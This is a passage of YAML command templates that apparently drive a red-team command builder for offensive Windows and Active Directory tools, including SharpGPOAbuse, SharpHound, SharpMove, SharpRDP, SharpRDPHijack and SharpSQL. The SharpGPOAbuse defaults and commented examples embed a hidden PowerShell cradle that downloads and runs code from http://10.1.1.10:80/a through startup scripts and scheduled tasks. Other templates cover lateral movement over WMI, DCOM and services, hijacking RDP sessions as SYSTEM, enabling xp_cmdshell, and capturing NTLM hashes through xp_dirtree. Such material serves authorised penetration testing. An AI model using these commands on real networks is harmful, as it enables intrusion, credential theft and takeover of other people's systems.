30 | template: "--extensions={0}" 31 | default: exe,xml,bat,ps1 32 | optional: true 33 | 34 | - name: Readable 35 | type: flag 36 | description: Only return files the current user has read access to 37 | value: "--readable" 38 | optional: true 39 | selected: false 40 | - name: Writeable 41 | type: flag 42 | description: Only return files the current user has write access to 43 | value: "--writeable" 44 | optional: true 45 | selected: false 46 | - name: ReadWriteable 47 | type: flag 48 | description: Require both read and write access (ANDs the Readable and Writeable filters; use together with them) 49 | value: "--acl-filter-mode-and" 50 | optional: true 51 | selected: false 52 | - name: ExcludeHidden 53 | type: flag 54 | description: Exclude hidden files from search 55 | value: "--exclude-hidden" 56 | optional: true 57 | selected: false 58 | 59 | sections: 60 | - name: Self crafted command 61 | labels: [] 62 | mitre: '' 63 | verb: '' 64 | required_flags: [] 65 | optional_flags: [Path, InputFile, Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] 66 | 67 | - name: Search files in specific directory 68 | labels: [] 69 | mitre: '' 70 | verb: '' 71 | required_flags: [Path] 72 | optional_flags: [Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] 73 | 74 | - name: Search files in multiple directories 75 | labels: [] 76 | mitre: '' 77 | verb: '' 78 | required_flags: [InputFile] 79 | optional_flags: [Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] -------------------------------------------------------------------------------- /commands/SharpGPOAbuse.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/FSecureLABS/SharpGPOAbuse 3 | name: SharpGPOAbuse 4 | languages: 5 | - name: EXE 6 | prefix: SharpGPOAbuse.exe 7 | 8 | params: 9 | - name: AttackType 10 | description: The attack type to use 11 | default: "--AddComputerScript" 12 | template: "{0}" 13 | type: select 14 | options: 
["--AddUserRights", "--AddLocalAdmin", "--AddComputerScript", "--AddUserScript", "--AddComputerTask", "--AddUserTask"] 15 | optional: false 16 | 17 | - name: Rights manipulation 18 | type: label 19 | 20 | - name: UserRights 21 | type: text 22 | description: Set the new rights to add to a user. This option is case sensitive and a comma separated list must be used. 23 | template: "--UserRights \"{0}\"" 24 | default: SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight 25 | optional: true 26 | - name: UserAccount 27 | type: text 28 | description: Set the account to add the new rights. 29 | template: "--UserAccount {0}" 30 | default: bob.smith 31 | optional: true 32 | - name: GPOName 33 | type: text 34 | description: The name of the vulnerable GPO (one the current user has write access to). 35 | template: "--GPOName \"{0}\"" 36 | default: Vulnerable GPO 37 | optional: true 38 | 39 | - name: Scripts configuration 40 | type: label 41 | 42 | - name: ScriptName 43 | type: text 44 | description: Set the name of the new startup script. 45 | template: "--ScriptName {0}" 46 | default: StartupScript.bat 47 | optional: true 48 | - name: ScriptContents 49 | type: text 50 | description: Set the contents of the new startup script. 51 | template: "--ScriptContents \"{0}\"" 52 | default: if %username%== powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\" 53 | optional: true 54 | 55 | - name: Task configuration 56 | type: label 57 | 58 | - name: TaskName 59 | type: text 60 | description: Set the name of the new computer task. 61 | template: "--TaskName \"{0}\"" 62 | default: Update 63 | optional: true 64 | - name: Author 65 | type: text 66 | description: Set the author of the new task (use a DA account). 67 | template: "--Author {0}" 68 | default: Example\Admin 69 | optional: true 70 | - name: Command 71 | type: text 72 | description: Command to execute. 
73 | template: "--Command \"{0}\"" 74 | default: cmd.exe 75 | optional: true 76 | - name: Arguments 77 | type: text 78 | description: Arguments passed to the command. 79 | template: "--Arguments \"{0}\"" 80 | default: /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\" 81 | optional: true 82 | 83 | - name: TargetUsername 84 | type: text 85 | description: The user to target. The malicious task will run only on the specified user. Should be in the format DOMAIN\username (see the default). 86 | template: "--TargetUsername {0}" 87 | default: Example\Admin 88 | optional: true 89 | - name: TargetUserSID 90 | type: text 91 | description: The targeted user's SID (note that this template emits the bare value with no option switch, unlike the other parameters - verify against the tool's usage before relying on it). 92 | template: "{0}" 93 | default: S-1-24 94 | optional: true 95 | - name: TargetDnsName 96 | type: text 97 | description: The DNS name of the computer to target. The malicious task will run only on the specified host. 98 | template: "--TargetDnsName {0}" 99 | default: target.example.local 100 | optional: true 101 | 102 | - name: Domain 103 | type: text 104 | description: Set the target domain 105 | template: "--Domain {0}" 106 | default: example.local 107 | optional: true 108 | - name: DomainController 109 | type: text 110 | description: Set the target domain controller 111 | template: "--DomainController {0}" 112 | default: dc1.example.local 113 | optional: true 114 | 115 | - name: Flags 116 | type: label 117 | 118 | - name: FilterEnabled 119 | type: flag 120 | description: Enable Target Filtering for computer immediate tasks. 
121 | value: "--FilterEnabled" 122 | optional: true 123 | selected: false 124 | - name: Force 125 | type: flag 126 | description: Overwrite existing files if required 127 | value: "--Force" 128 | optional: true 129 | selected: false 130 | 131 | sections: 132 | - name: Self crafted command 133 | labels: ["Lateral"] 134 | mitre: '' 135 | verb: '' 136 | required_flags: [AttackType] 137 | optional_flags: [UserRights, UserAccount, GPOName, ScriptName, ScriptContents, TaskName, Author, Command, Arguments, FilterEnabled, TargetUsername, TargetUserSID, TargetDnsName] 138 | 139 | - name: Adding User Rights 140 | labels: ["Lateral", "Creds"] 141 | mitre: '' 142 | verb: '--AddUserRights' 143 | required_flags: [UserRights, UserAccount, GPOName] 144 | optional_flags: [] 145 | 146 | - name: Adding a Local Admin 147 | labels: ["Lateral", "Creds"] 148 | mitre: '' 149 | verb: '--AddLocalAdmin' 150 | required_flags: [UserAccount, GPOName] 151 | optional_flags: [] 152 | 153 | - name: Configuring a User or Computer Logon Script 154 | labels: ["Lateral", "Creds"] 155 | mitre: '' 156 | verb: '--AddUserScript' 157 | required_flags: [ScriptName, ScriptContents, GPOName] 158 | optional_flags: [] 159 | 160 | - name: Configuring a Computer or User Immediate Task 161 | labels: ["Lateral", "Creds"] 162 | mitre: '' 163 | verb: '--AddComputerTask' 164 | required_flags: [TaskName, Author, Command, Arguments, GPOName, FilterEnabled, TargetDnsName] 165 | optional_flags: [] 166 | 167 | 168 | 169 | # - name: Configuring a User or Computer Logon Script 170 | 171 | # commands: 172 | # - language: EXE 173 | # command: SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "{{GPOName}}" 174 | 175 | # - name: Configuring a User or Computer Logon Script, specific user or computer 176 | # labels: ["Lateral", "Creds"] 177 | # commands: 178 | # - language: EXE 
179 | # command: SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "" --GPOName "{{GPOName}}" 180 | 181 | # - name: Configuring a Computer or User Immediate Task 182 | # labels: ["Lateral", "Creds"] 183 | # commands: 184 | # - language: EXE 185 | # command: SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "{{GPOName}}" 186 | 187 | # - name: Configuring a Computer or User Immediate Task, specific user or computer 188 | # labels: ["Lateral", "Creds"] 189 | # commands: 190 | # - language: EXE 191 | # command: SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com 192 | -------------------------------------------------------------------------------- /commands/SharpHound.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | sigmaRulesURL: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml 4 | # https://github.com/SigmaHQ/sigma/raw/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml 5 | name: SharpHound 6 | languages: 7 | - name: EXE 8 | prefix: SharpHound.exe 9 | - name: Apollo 10 | prefix: inline_assembly -Assembly "SharpHound" -Arguments " 11 | 12 | params: 13 | - name: CollectionMethod 14 | description: Specify collection method for BH. 
15 | default: "All" 16 | template: "-c {0}" 17 | type: select 18 | options: ["Default", "All", "DCOnly", "ComputerOnly", "Session", "LoggedOn", "Group", "ACL", "GPOLocalGroup", "Trusts", "Container", "LocalGroup", "LocalAdmin", "RDP", "DCOM", "PSRemote", "ObjectProps"] 19 | optional: false 20 | - name: Domain 21 | type: text 22 | description: Name of the domain to enumerate 23 | template: "-d {0}" 24 | default: example.local 25 | optional: false 26 | 27 | - name: Search Filters 28 | type: label 29 | 30 | - name: LDAPFilter 31 | template: "-f \"{0}\"" 32 | description: Add an LDAP filter to the pregenerated filter. 33 | type: text 34 | default: (CN=*,OU=Example,DC=Example,DC=Local) 35 | optional: true 36 | 37 | - name: DistinguishedName 38 | type: text 39 | description: Base DistinguishedName to start search at. 40 | template: "--distinguishedname \"{0}\"" 41 | default: OU=Example,DC=Example,DC=Local 42 | optional: true 43 | 44 | - name: Input Output 45 | type: label 46 | 47 | - name: ComputerFile 48 | type: text 49 | description: Path to file containing computer names to enumerate 50 | template: "--computerfile \"{0}\"" 51 | default: file.txt 52 | optional: true 53 | - name: OutputDirectory 54 | type: text 55 | description: Directory to output file too 56 | template: "--outputdirectory \"{0}\"" 57 | default: "." 
58 | optional: true 59 | - name: OutputPrefix 60 | type: text 61 | description: String to prepend to output file names 62 | template: "--outputprefix {0}" 63 | default: prefix 64 | optional: true 65 | - name: CacheName 66 | type: text 67 | description: Filename for cache (Defaults to a machine specific identifier) 68 | template: "--cachename {0}" 69 | default: cache 70 | optional: true 71 | - name: ZipFileName 72 | type: text 73 | description: Filename for the zip 74 | template: "--zipfilename {0}" 75 | default: ZipName 76 | optional: true 77 | - name: ZipPassword 78 | type: text 79 | description: Password protects the zip with the specified password 80 | template: "--zippassword {0}" 81 | default: Z!pP4ssw0rd@ 82 | optional: true 83 | 84 | - name: Authentication 85 | type: label 86 | 87 | - name: Username 88 | description: Username for LDAP 89 | type: text 90 | default: user1 91 | template: "--ldapusername {0}" 92 | optional: true 93 | - name: Password 94 | description: Password for LDAP 95 | type: text 96 | template: "--ldappassword {0}" 97 | default: P@ssw0rd 98 | optional: true 99 | selected: false 100 | 101 | - name: LDAP config 102 | type: label 103 | 104 | - name: DomainController 105 | type: text 106 | description: Override domain controller to pull LDAP from. This option can result in data loss 107 | template: "--domaincontroller {0}" 108 | default: dc1 109 | optional: true 110 | - name: LDAPPort 111 | type: text 112 | description: Override port for LDAP 113 | template: "--ldapport {0}" 114 | default: 0 115 | optional: true 116 | 117 | - name: Scanning config 118 | type: label 119 | 120 | - name: PortCheckTimeout 121 | type: text 122 | description: Timeout for port checks in milliseconds 123 | template: "--portchecktimeout {0}" 124 | default: 500 125 | optional: true 126 | - name: Throttle 127 | type: text 128 | description: Add a delay after computer requests in milliseconds. 
129 | template: "--throttle {0}" 130 | default: 0 131 | optional: true 132 | - name: Jitter 133 | type: text 134 | description: Add jitter to throttle (percent) 135 | template: "--jitter {0}" 136 | default: 0 137 | optional: true 138 | - name: Threads 139 | type: text 140 | description: Number of threads to run enumeration with. 141 | template: "--threads {0}" 142 | default: 50 143 | optional: true 144 | 145 | - name: Loop Config 146 | type: label 147 | 148 | - name: LoopDuration 149 | type: text 150 | description: Loop duration as hh:mm:ss (SharpHound's own default is 2 hours; note that 00:02:00 reads as 2 minutes in hh:mm:ss, so check the value below against the tool's help before a long collection) 151 | template: "--loopduration {0}" 152 | default: 00:02:00 153 | optional: true 154 | - name: LoopInterval 155 | type: text 156 | description: Delay between loops as hh:mm:ss (e.g. 00:01:00 is 1 minute; 00:00:01 is only 1 second) 157 | template: "--loopinterval {0}" 158 | default: 00:00:01 159 | optional: true 160 | - name: StatusInterval 161 | type: text 162 | description: Interval in which to display status in milliseconds. 163 | template: "--statusinterval {0}" 164 | default: 30000 165 | optional: true 166 | 167 | 168 | - name: Flags 169 | type: label 170 | 171 | - name: SearchForest 172 | type: flag 173 | description: Search all available domains in the forest 174 | value: "-s" 175 | optional: true 176 | selected: false 177 | - name: Stealth 178 | type: flag 179 | description: Perform “stealth” data collection 180 | value: "--stealth" 181 | optional: true 182 | selected: true 183 | - name: MemCache 184 | type: flag 185 | description: Keep cache in memory and don't write to disk 186 | value: "--memcache" 187 | optional: true 188 | selected: false 189 | - name: RebuildCache 190 | type: flag 191 | description: Rebuild cache and remove all entries 192 | value: "--rebuildcache" 193 | optional: true 194 | selected: false 195 | - name: RandomFileNames 196 | type: flag 197 | description: Use random filenames for output 198 | value: "--randomfilenames" 199 | optional: true 200 | selected: false 201 | - name: NoZip 202 | type: flag 203 | 
description: Don't zip files 204 | value: "--nozip" 205 | optional: true 206 | selected: false 207 | - name: TrackComputerCalls 208 | type: flag 209 | description: Adds a CSV tracking requests to computers 210 | value: "--trackcomputercalls" 211 | optional: true 212 | selected: false 213 | - name: PrettyPrint 214 | type: flag 215 | description: Pretty print JSON 216 | value: "--prettyprint" 217 | optional: true 218 | selected: false 219 | - name: LDAPS 220 | type: flag 221 | description: Connect over LDAPS instead of plaintext LDAP 222 | value: "--secureldap" 223 | optional: true 224 | selected: true 225 | - name: DisableCertVerification 226 | type: flag 227 | description: Disable certificate verification for secure LDAP (this removes the MITM protection LDAPS gives the LDAP credentials; only use it when the DC certificate chain is untrusted and the risk is accepted) 228 | value: "--disablecertverification" 229 | optional: true 230 | selected: false 231 | - name: DisableSigning 232 | type: flag 233 | description: Disables Kerberos Signing/Sealing on the LDAP connection (leave off unless the DC rejects the signed bind) 234 | value: "--disablesigning" 235 | optional: true 236 | selected: false 237 | - name: SkipPortCheck 238 | type: flag 239 | description: Skip checking if 445 is open 240 | value: "--skipportcheck" 241 | optional: true 242 | selected: false 243 | - name: SkipPasswordCheck 244 | type: flag 245 | description: Skip PwdLastSet age check when checking computers 246 | value: "--skippasswordcheck" 247 | optional: true 248 | selected: false 249 | - name: ExcludeDC 250 | type: flag 251 | description: Exclude domain controllers from session/localgroup enumeration (mostly for ATA/ATP) 252 | value: "--excludedcs" 253 | optional: true 254 | selected: false 255 | - name: Loop 256 | type: flag 257 | description: Loop computer collection 258 | value: "-l" 259 | optional: true 260 | selected: false 261 | 262 | 263 | 264 | sections: 265 | - name: Collect 266 | labels: ["Recon", "LDAP"] 267 | mitre: "T1590.001" 268 | verb: '' 269 | required_flags: [CollectionMethod, Domain] 270 | optional_flags: [ 271 | LDAPFilter, 272 | DistinguishedName, 273 | ComputerFile, 274 | OutputDirectory, 275 | OutputPrefix, 276 | 
CacheName, 277 | ZipFileName, 278 | ZipPassword, 279 | Username, 280 | Password, 281 | DomainController, 282 | LDAPPort, 283 | PortCheckTimeout, 284 | Throttle, 285 | Jitter, 286 | Threads, 287 | LoopDuration, 288 | LoopInterval, 289 | StatusInterval, 290 | SearchForest, 291 | Stealth, 292 | MemCache, 293 | RebuildCache, 294 | RandomFileNames, 295 | NoZip, 296 | TrackComputerCalls, 297 | PrettyPrint, 298 | LDAPS, 299 | DisableCertVerification, 300 | DisableSigning, 301 | SkipPortCheck, 302 | SkipPasswordCheck, 303 | ExcludeDC, 304 | Loop 305 | ] -------------------------------------------------------------------------------- /commands/SharpMove.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/0xthirteen/SharpMove 3 | name: SharpMove 4 | languages: 5 | - name: EXE 6 | prefix: SharpMove.exe 7 | 8 | params: 9 | - name: action 10 | description: Action to execute 11 | default: query 12 | template: "action={0}" 13 | type: select 14 | options: [query, create, executevbs, taskscheduler, dcom, scm, modsvc, modschtask, hijackdcom, startservice] 15 | optional: false 16 | - name: ComputerName 17 | type: text 18 | description: Target computer name (hostname or FQDN) 19 | template: "computername={0}" 20 | default: Comp1.windomain.local 21 | optional: false 22 | 23 | - name: Command 24 | type: text 25 | description: Command to execute 26 | template: "command=\"{0}\"" 27 | default: C:\windows\temp\payload.exe 28 | optional: true 29 | - name: Query 30 | type: text 31 | description: WMI query 32 | template: "query=\"{0}\"" 33 | default: select * from win32_process 34 | optional: true 35 | - name: ServiceName 36 | type: text 37 | description: Service name 38 | template: "servicename={0}" 39 | default: TestService 40 | optional: true 41 | - name: CLSID 42 | type: text 43 | description: CLSID 44 | template: "clsid={0}" 45 | default: "{40bdc4e5-d532-42e6-b667-1ab890fdebcf}" 46 | optional: true 47 | - name: TaskName 48 | type: text 49 | 
description: Task name 50 | template: "taskname={0}" 51 | default: TestTask 52 | optional: true 53 | - name: Method 54 | type: text 55 | description: DCOM object/method to use for the dcom action (e.g. ShellBrowserWindow) 56 | template: "method={0}" 57 | default: ShellBrowserWindow 58 | optional: true 59 | - name: EventName 60 | type: text 61 | description: Event name 62 | template: "eventname={0}" 63 | default: Debug 64 | optional: true 65 | 66 | - name: Authentication 67 | type: label 68 | 69 | - name: Domain 70 | type: text 71 | description: Domain of the account used for authentication (substituted into the Username template as DOMAIN\user) 72 | template: "{0}" 73 | default: 74 | optional: false 75 | - name: Username 76 | type: text 77 | description: Username 78 | template: "username={Domain}\\{0}" 79 | default: User1 80 | optional: true 81 | - name: Password 82 | type: text 83 | description: Password 84 | template: "password={0}" 85 | default: Password123 86 | optional: true 87 | 88 | - name: Flags 89 | type: label 90 | 91 | - name: AMSI 92 | type: flag 93 | description: Passes amsi=true to SharpMove (its AMSI-handling option; confirm the exact behaviour against the project README before relying on it) 94 | value: "amsi=true" 95 | optional: true 96 | selected: false 97 | 98 | sections: 99 | - name: Self crafted command 100 | labels: [] 101 | mitre: '' 102 | verb: '' 103 | required_flags: [action, ComputerName] 104 | optional_flags: [Command, Query, ServiceName, CLSID, TaskName, Method, EventName, Username, Password, AMSI] 105 | - name: Query WMI 106 | labels: ["Recon", "Creds", "WMI"] 107 | mitre: '' 108 | verb: 'action=query' 109 | required_flags: [ComputerName, Query, Username, Password] 110 | optional_flags: [] 111 | - name: Execute WMI 112 | labels: ["Lateral", "Creds", "WMI"] 113 | mitre: '' 114 | verb: 'action=create' 115 | required_flags: [ComputerName, Command, Username, Password, AMSI] 116 | optional_flags: [] 117 | - name: Execute VBS 118 | labels: ["Lateral", "Creds", "VBS"] 119 | mitre: '' 120 | verb: 'action=executevbs' 121 | required_flags: [ComputerName, EventName, Username, Password, AMSI] 122 | optional_flags: [] 123 | - name: Execute task over TaskScheduler 124 | labels: ["Lateral", "Creds"] 125 | mitre: '' 126 | verb: 
'action=taskscheduler' 127 | required_flags: [ComputerName, Command, TaskName, Username, Password, AMSI] 128 | optional_flags: [] 129 | - name: Execute task over DCOM 130 | labels: ["Lateral", "Creds", "DCOM"] 131 | mitre: '' 132 | verb: 'action=dcom' 133 | required_flags: [ComputerName, Command, Method, AMSI] 134 | optional_flags: [] 135 | - name: Execute task over SCM 136 | labels: ["Lateral", "Creds", "SCM"] 137 | mitre: '' 138 | verb: 'action=scm' 139 | required_flags: [ComputerName, Command, ServiceName, AMSI] 140 | optional_flags: [] 141 | - name: Execute task over modsvc 142 | labels: ["Lateral", "Creds"] 143 | mitre: '' 144 | verb: 'action=modsvc' 145 | required_flags: [ComputerName, Command, ServiceName, AMSI] 146 | optional_flags: [] 147 | - name: Execute task over modschtask 148 | labels: ["Lateral", "Creds"] 149 | mitre: '' 150 | verb: 'action=modschtask' 151 | required_flags: [ComputerName, Command, Username, Password, TaskName] 152 | optional_flags: [] 153 | - name: Execute task using hijackdcom 154 | labels: ["Lateral", "Creds"] 155 | mitre: '' 156 | verb: 'action=hijackdcom' 157 | required_flags: [ComputerName, CLSID] 158 | optional_flags: [] 159 | - name: Execute task using start service 160 | labels: ["Lateral", "Creds"] 161 | mitre: '' 162 | verb: 'action=startservice' 163 | required_flags: [ComputerName, ServiceName] 164 | optional_flags: [] 165 | -------------------------------------------------------------------------------- /commands/SharpRDP.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Sygnia/SharpRDP 3 | name: SharpRDP 4 | languages: 5 | - name: EXE 6 | prefix: SharpRDP.exe 7 | 8 | params: 9 | - name: ComputerName 10 | type: text 11 | description: Target computer name 12 | template: "computername={0}" 13 | default: Comp1.windomain.local 14 | optional: false 15 | - name: Command 16 | type: text 17 | description: Command to execute 18 | template: 
"command=\"{0}\"" 19 | default: C:\temp\file.exe 20 | optional: false 21 | - name: Username 22 | type: text 23 | description: Username 24 | template: "username={0}" 25 | default: User1 26 | optional: true 27 | - name: Password 28 | type: text 29 | description: User password 30 | template: "password={0}" 31 | default: Password123 32 | optional: true 33 | - name: Exec 34 | type: text 35 | description: Parent process to run the command under (cmd or powershell) 36 | template: "{0}" 37 | default: cmd 38 | optional: true 39 | - name: Elevated 40 | description: Execute elevated command using one of the following options 41 | default: taskmgr 42 | template: "elevated={0}" 43 | type: select 44 | options: [taskmgr, winr] 45 | optional: true 46 | 47 | - name: NLA 48 | type: flag 49 | description: Connect using Network Level Authentication 50 | value: nla=true 51 | optional: true 52 | selected: false 53 | - name: Takeover 54 | type: flag 55 | description: Take over an existing session on the target 56 | value: takeover=true 57 | optional: true 58 | selected: false 59 | - name: ConnectDrive 60 | type: flag 61 | description: Map the local host's drives into the RDP session 62 | value: connectdrive=true 63 | optional: true 64 | selected: false 65 | 66 | sections: 67 | - name: Self crafted command 68 | labels: ["Lateral", "RDP"] 69 | mitre: '' 70 | verb: '' 71 | required_flags: [ComputerName, Command] 72 | optional_flags: [Username, Password, Exec, ConnectDrive, Elevated, NLA, Takeover] 73 | 74 | - name: Regular RDP connection and execution 75 | labels: ["Lateral", "RDP"] 76 | mitre: '' 77 | verb: '' 78 | required_flags: [ComputerName, Command, Username, Password] 79 | optional_flags: [] 80 | 81 | - name: Exec program as child process of cmd or powershell 82 | labels: ["Lateral", "RDP"] 83 | mitre: '' 84 | verb: '' 85 | required_flags: [ComputerName, Command, Username, Password, Exec] 86 | optional_flags: [] 87 | 88 | - name: Use restricted admin mode (no credentials passed; relies on the current logon context) 89 | labels: ["Lateral", "RDP"] 90 | mitre: '' 91 | verb: '' 92 | required_flags: [ComputerName, Command] 93 | 
optional_flags: [] 94 | 95 | - name: Connect first host drives 96 | labels: ["Lateral", "RDP"] 97 | mitre: '' 98 | verb: '' 99 | required_flags: [ComputerName, Command, Username, Password, ConnectDrive] 100 | optional_flags: [] 101 | 102 | - name: Execute command elevated 103 | labels: ["Lateral", "RDP"] 104 | mitre: '' 105 | verb: '' 106 | required_flags: [ComputerName, Command, Username, Password, Elevated] 107 | optional_flags: [] 108 | 109 | - name: Add Network Level Authentication 110 | labels: ["Lateral", "RDP"] 111 | mitre: '' 112 | verb: '' 113 | required_flags: [ComputerName, Command, Username, Password, NLA] 114 | optional_flags: [] 115 | 116 | - name: Ask to take over logon session 117 | labels: ["Lateral", "RDP"] 118 | mitre: '' 119 | verb: '' 120 | required_flags: [ComputerName, Command, Username, Password, Takeover] 121 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpRDPHijack.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/bohops/SharpRDPHijack 3 | name: SharpRDPHijack 4 | languages: 5 | - name: EXE 6 | prefix: SharpRDPHijack.exe 7 | 8 | params: 9 | - name: Host 10 | type: text 11 | description: Query a host to identify RDP/TS session information (not required for other switches) 12 | template: "--tsquery={0}" 13 | default: localhost 14 | optional: true 15 | - name: Session 16 | type: text 17 | description: Target session identifier 18 | template: "--session={0}" 19 | default: 1 20 | optional: true 21 | - name: Password 22 | type: text 23 | description: Session password if known (otherwise optional - not required for disconnect switch) 24 | template: "--password={0}" 25 | default: Password123 26 | optional: true 27 | 28 | - name: Console 29 | type: flag 30 | description: Redirect session to console session instead of current (active) session 31 | value: --console 32 | optional: true 33 | selected: 
false 34 | - name: Disconnect 35 | type: flag 36 | description: Disconnect an active (remote) session 37 | value: --disconnect 38 | optional: true 39 | selected: false 40 | 41 | sections: 42 | - name: Self created RDP Hijack command 43 | labels: ["Lateral"] 44 | mitre: '' 45 | verb: '' 46 | required_flags: [] 47 | optional_flags: [Host, Session, Password, Console, Disconnect] 48 | - name: Query the local host for RDP/TS session information 49 | labels: ["Lateral"] 50 | mitre: '' 51 | verb: '' 52 | required_flags: [Host] 53 | optional_flags: [] 54 | - name: Impersonate NT AUTHORITY\SYSTEM to hijack session and redirect to the current session 55 | labels: ["Lateral"] 56 | mitre: '' 57 | verb: '' 58 | required_flags: [Session] 59 | optional_flags: [] 60 | - name: Impersonate NT AUTHORITY\SYSTEM to hijack session and redirect to the console session 61 | labels: ["Lateral"] 62 | mitre: '' 63 | verb: '' 64 | required_flags: [Session, Console] 65 | optional_flags: [] 66 | - name: Hijack Remote Desktop session with knowledge of the logged-on user's password 67 | labels: ["Lateral"] 68 | mitre: '' 69 | verb: '' 70 | required_flags: [Session, Password] 71 | optional_flags: [] 72 | - name: Disconnect active session 73 | labels: ["Lateral"] 74 | mitre: '' 75 | verb: '' 76 | required_flags: [Session, Disconnect] 77 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpSCCM.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Mayyhem/SharpSCCM 3 | name: SharpSCCM 4 | params: 5 | 6 | sections: 7 | - name: name 8 | labels: [] 9 | mitre: '' 10 | commands: 11 | - language: EXE 12 | command: some 13 | -------------------------------------------------------------------------------- /commands/SharpSQL.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/mlcsec/SharpSQL 2 | name: 
SharpSQL 3 | languages: 4 | - name: EXE 5 | prefix: 'SharpSQL.exe' 6 | - name: Apollo 7 | prefix: inline_assembly -Assembly "SharpSQL.exe" -Arguments " 8 | 9 | params: 10 | - name: Target 11 | type: label 12 | 13 | - name: Instance 14 | type: text 15 | description: The targeted SQL server instance 16 | template: "-Instance {0}" 17 | default: sql.server 18 | optional: false 19 | 20 | - name: Database 21 | type: text 22 | description: The db to connect to (default - master) 23 | template: "-db {0}" 24 | optional: true 25 | 26 | - name: LinkedInstance 27 | type: text 28 | description: The linked instance to target 29 | template: "-LinkedInstance {0}" 30 | default: linked.sql.server 31 | optional: true 32 | 33 | - name: Username 34 | type: text 35 | description: The SQL user to impersonate 36 | template: "-User {0}" 37 | optional: true 38 | 39 | - name: Execute 40 | type: label 41 | 42 | - name: Command 43 | type: text 44 | description: The command to execute 45 | template: "-Command {0}" 46 | default: "whoami && ipconfig" 47 | optional: true 48 | 49 | - name: Query 50 | type: text 51 | description: The raw SQL query to execute 52 | template: "-Query {0}" 53 | optional: true 54 | 55 | - name: Option for Get-Hash 56 | type: label 57 | 58 | - name: ListenerAddress # Get-Hash 59 | type: text 60 | description: IP of your SMB listener; xp_dirtree is pointed at the /pwn share on it so the SQL service account authenticates to the listener (the listener must be running before you run Get-Hash) 61 | template: "-ip {0}" 62 | default: '' 63 | optional: true 64 | 65 | 66 | - name: Self-craft 67 | type: label 68 | 69 | - name: Method 70 | type: select 71 | description: Select a method for self crafted command 72 | template: "{0}" 73 | optional: false 74 | default: 'Get-DBUser' 75 | options: [ 76 | #Get-SQLInstanceDomain, 77 | Get-Databases, 78 | Get-DBUser, 79 | Get-GroupMembership, 80 | Get-Hash, 81 | Get-ImpersonableUsers, 82 | Get-LinkedServers, 83 | Get-LinkedPrivs, 84 | Get-Sysadmins, 85 | Get-SystemUser, 86 | Get-SQLQuery, 87 | Get-Triggers, 88 | Get-Users, 89 | Get-UserPrivs, 90 | Check-Cmdshell, 91 | 
Check-LinkedCmdshell, 92 | Clear-CLRAsm, 93 | Enable-Cmdshell, 94 | Enable-LinkedCmdshell, 95 | Invoke-OSCmd, 96 | Invoke-LinkedOSCmd, 97 | Invoke-ExternalScript, 98 | Invoke-OLEObject, 99 | Invoke-CLRAsm, 100 | Invoke-UserImpersonation, 101 | Invoke-DBOImpersonation 102 | ] 103 | 104 | 105 | sections: 106 | - name: Get SQL instances within current domain via user and computer SPNs 107 | labels: [Recon,SQL] 108 | mitre: '' 109 | verb: 'Get-SQLInstanceDomain' 110 | required_flags: [] 111 | optional_flags: [] 112 | 113 | - name: Get the Windows User/Machine hash via xp_dirtree. Make sure an SMB listener (e.g. ntlmrelayx, Inveigh) is already running on ListenerAddress. 114 | labels: [Credential Access,SQL] 115 | mitre: '' 116 | verb: 'Get-Hash' 117 | required_flags: [Instance, ListenerAddress] 118 | optional_flags: [Database, LinkedInstance, Username] 119 | 120 | - name: Get the privileges of the current user context 121 | labels: [Recon,SQL] 122 | mitre: '' 123 | verb: 'Get-UserPrivs' 124 | required_flags: [Instance] 125 | optional_flags: [Database, LinkedInstance, Username] 126 | 127 | - name: Get linked SQL servers 128 | labels: [Recon,SQL] 129 | mitre: '' 130 | verb: 'Get-LinkedServers' 131 | required_flags: [Instance] 132 | optional_flags: [] 133 | 134 | - name: Get sysadmin users 135 | labels: [Recon,SQL] 136 | mitre: '' 137 | verb: 'Get-Sysadmins' 138 | required_flags: [Instance] 139 | optional_flags: [] 140 | 141 | - name: Enable xp_cmdshell on instance (a persistent, noisy configuration change - disable it again when finished) 142 | labels: [Exec, SQL, xp_cmdshell] 143 | mitre: '' 144 | verb: 'Enable-Cmdshell' 145 | required_flags: [Instance] 146 | optional_flags: [] 147 | 148 | - name: Invoke OS command 149 | labels: [Exec, SQL, xp_cmdshell] 150 | mitre: '' 151 | verb: 'Invoke-OSCmd' 152 | required_flags: [Instance, Command] 153 | optional_flags: [] 154 | 155 | - name: Invoke command execution via impersonation 156 | labels: [Exec, SQL, xp_cmdshell] 157 | mitre: '' 158 | verb: 'Invoke-UserImpersonation' 159 | required_flags: [Instance, Username, Query] 160 | 
